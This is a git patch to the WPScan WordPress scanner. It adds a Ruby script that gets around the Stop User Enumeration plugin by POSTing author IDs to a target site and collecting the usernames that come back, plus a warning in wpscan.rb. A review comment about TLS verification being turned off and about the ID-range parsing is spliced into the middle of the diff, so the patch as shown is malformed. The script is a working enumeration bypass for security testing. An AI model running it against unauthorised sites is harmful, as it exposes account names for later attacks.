From 45f5f50262b71bd864e012637d8e383ce470bf05 Mon Sep 17 00:00:00 2001
From: erwanlr
Date: Wed, 16 Apr 2014 15:09:41 +0200
Subject: [PATCH] Fixes #456 - stop-user-enumeration detection & script for bypass
---
 stop_user_enumeration_bypass.rb | 73 +++++++++++++++++++++++++++++++++
 wpscan.rb | 5 +++
 2 files changed, 78 insertions(+)
 create mode 100755 stop_user_enumeration_bypass.rb
diff --git a/stop_user_enumeration_bypass.rb b/stop_user_enumeration_bypass.rb
new file mode 100755
index 00000000..af631471
--- /dev/null
+++ b/stop_user_enumeration_bypass.rb
@@ -0,0 +1,73 @@
+#!/usr/bin/env ruby
+# encoding: UTF-8
+#
+#
+# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
+
+require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
+
+@opts = {
+ ids: 1..10,
+ verbose: false,
+ user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
+}
+
+parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb [options]', 35) do |opts|
+ opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
+ @opts[:proxy] = proxy
+ end
+
+ opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
+ @opts[:creds] = creds
+ end
+
+ opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
+ @opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
+ end
+
+ opts.on('--user-agent UA', 'The user-agent to use') do |ua|
+ @opts[:user_agent] = ua
+ end
+
+ opts.on('--verbose', '-v', 'Verbose Mode') do
+ @opts[:verbose] = true
+ end
+end
+
+begin
+ parser.parse!
+
+ fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
+
+ uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
+
+ request_params = {
+ proxy: @opts[:proxy],
+ userpwd: @opts[:creds],
+ headers: { 'User-Agent' => @opts[:user_agent] },
+ followlocation: true,
+ ssl_verifypeer: false,
+ ssl_verifyhost: 2
+ }
+
+ detected_users = WpUsers.new
+
+ @opts[:ids].each do |user_id|
+ user = WpUser.new(uri, id: user_id)
+
+ if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
+ detected_users << user
+ end
+ end
+
+ puts 'Usernames found:'
+ detected_users.output
+rescue => e
+ puts e.message
+
+ if @opts[:verbose]
+ puts red('Trace:')
+ puts red(e.backtrace.join("\n"))
+ end
+ exit(1)
+end
diff --git a/wpscan.rb b/wpscan.rb
index ea279ced..2239085c 100755
--- a/wpscan.rb
+++ b/wpscan.rb
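Review bot: `ssl_verifypeer: false` in `request_params` switches off TLS peer verification for every request, while the same hash sends the `--auth` credentials in `userpwd`, so with `--auth` the script will present Basic/NTLM credentials to whoever terminates the connection; as far as I recall `ssl_verifyhost: 2` only matches the name on an otherwise unverified certificate, so it does not close that gap. Verification should stay on by default and be disabled only on request, e.g. an `opts.on('--disable-tls-checks', 'Skip TLS certificate verification') { @opts[:disable_tls_checks] = true }` entry beside `--proxy` and `ssl_verifypeer: !@opts[:disable_tls_checks],` in `request_params`. The `--ids` handler is also fragile: `Range.new(*ids.split('-').map(&:to_i))` turns `1-x` into `1..0` and silently checks nothing, and a single number makes `Range.new` raise an ArgumentError that the generic `rescue => e` prints as the only diagnostic; `Integer()` on each half plus a check that exactly two halves were given would fail with a clear message. The header comment would also help with one sentence on what the script does (POSTs `author: user_id` to the target for each id and collects the ids `exists_from_response?` accepts), since only the seclists link is given.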
@@ -296,6 +296,11 @@ def main
 puts
 puts "#{green('[+]')} Enumerating usernames ..."
+ if wp_target.has_plugin?('stop-user-enumeration')
+ puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
+ "However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
+ end
+
 wp_users = WpUsers.aggressive_detection(wp_target, enum_options.merge(
 range: wpscan_options.enumerate_usernames_range,